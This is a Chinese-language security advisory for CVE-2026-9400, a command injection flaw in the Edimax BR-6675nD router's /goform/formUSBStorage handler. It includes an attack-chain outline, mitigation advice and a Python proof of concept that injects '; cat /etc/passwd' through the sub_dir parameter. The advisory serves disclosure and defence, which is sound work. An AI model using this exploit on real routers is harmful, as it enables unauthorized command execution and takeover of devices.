CVE-2026-9400 CVSS 6.3 中危

CVE-2026-9400 Edimax路由器命令注入漏洞

披露日期: 2026-05-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9400

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6675nD

漏洞概述

Edimax BR-6675nD 1.12版本存在命令注入漏洞。攻击者可通过操纵POST请求中的sub_dir参数，在/goform/formUSBStorage接口注入恶意命令。由于缺乏有效过滤，低权限攻击者无需用户交互即可远程执行系统命令，影响设备机密性、完整性和可用性。

技术细节

漏洞位于Edimax BR-6675nD路由器的/goform/formUSBStorage处理程序。当该组件处理POST请求时，未对sub_dir参数进行严格的输入校验，直接将其传递给系统命令执行环境。攻击者可利用Shell元字符（如;|&）拼接恶意指令。由于攻击向量为网络且权限要求较低，攻击者可利用此漏洞在目标设备上执行任意OS命令，获取设备控制权。

攻击链分析

STEP 1

侦察

攻击者扫描网络识别Edimax BR-6675nD设备及其Web管理接口。

STEP 2

访问

攻击者以低权限用户身份访问Web管理界面（或利用暴露的接口）。

STEP 3

利用

构造恶意POST请求发送至/goform/formUSBStorage，在sub_dir参数中注入Shell命令。

STEP 4

执行

服务器端未过滤输入，导致注入的命令随系统指令一起执行。

STEP 5

影响

攻击者成功获取系统Shell权限，可读取敏感文件或进一步控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_cve_2026_9400(target_ip):
    # Target endpoint
    url = f"http://{target_ip}/goform/formUSBStorage"
    
    # Command injection payload
    # ';' is used to chain commands in many Linux shells
    payload = "; cat /etc/passwd"
    
    # Form data to be sent
    data = {
        "sub_dir": payload
    }
    
    try:
        print(f"[*] Sending exploit request to {target_ip}...")
        response = requests.post(url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the target router IP address
    target = "192.168.1.1"
    exploit_cve_2026_9400(target)

影响范围

Edimax BR-6675nD 1.12

防御指南

临时缓解措施

若无法立即更新固件，建议通过网络ACL限制对/goform/*路径的访问，或暂时关闭USB存储相关的远程管理功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表